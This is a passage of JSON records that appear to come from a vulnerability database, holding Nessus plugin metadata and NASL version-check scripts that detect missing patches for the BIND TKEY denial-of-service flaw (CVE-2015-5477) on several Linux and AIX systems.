script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: 
\"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bind-9.9.6-10.P1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:21", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. 
By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 2 : bind9 (IV75690)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV75690.NASL", "href": "https://www.tenable.com/plugins/nessus/85414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85414);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 7.1 TL 2 : bind9 (IV75690)\");\n script_summary(english:\"Check for APAR IV75690\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. 
By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"06\", patch:\"IV75690s6a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.0.0\", maxfilesetver:\"7.1.2.19\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:23", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-04T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bind on SL6.x, SL7.x i386/x86_64 (20150729)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind", "p-cpe:/a:fermilab:scientific_linux:bind-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-libs", "p-cpe:/a:fermilab:scientific_linux:bind-libs-lite", "p-cpe:/a:fermilab:scientific_linux:bind-license", "p-cpe:/a:fermilab:scientific_linux:bind-lite-devel", "p-cpe:/a:fermilab:scientific_linux:bind-sdb", "p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-utils", "x-cpe:/o:fermilab:scientific_linux"], "id": 
"SL_20150729_BIND_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85211", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85211);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL6.x, SL7.x i386/x86_64 (20150729)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. 
(CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1508&L=scientific-linux-errata&F=&S=&P=77\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?21635c41\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-debuginfo-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:09", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-31T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : bind (SUSE-SU-2015:1316-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1316-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85151", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1316-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85151);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLES11 Security Update : bind (SUSE-SU-2015:1316-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has 
extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151316-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f319995\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP1-LTSS :\n\nzypper in -t patch slessp1-bind-12010=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-chrootenv-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-devel-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-doc-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-libs-9.6ESVR11W1-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"bind-utils-9.6ESVR11W1-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:12", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. 
BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : bind (CESA-2015:1513)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:bind", "p-cpe:/a:centos:centos:bind-chroot", "p-cpe:/a:centos:centos:bind-devel", "p-cpe:/a:centos:centos:bind-libs", "p-cpe:/a:centos:centos:bind-libs-lite", "p-cpe:/a:centos:centos:bind-license", "p-cpe:/a:centos:centos:bind-lite-devel", "p-cpe:/a:centos:centos:bind-sdb", "p-cpe:/a:centos:centos:bind-sdb-chroot", "p-cpe:/a:centos:centos:bind-utils", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-1513.NASL", "href": 
"https://www.tenable.com/plugins/nessus/85047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1513 and \n# CentOS Errata and Security Advisory 2015:1513 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85047);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"CentOS 6 / 7 : bind (CESA-2015:1513)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. 
Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-July/021268.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8978d17\"\n );\n # http://lists.centos.org/pipermail/centos-cr-announce/2015-July/002105.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e20c6079\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n# Temp disable\nexit(0, 'Temporarily disabled.');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif 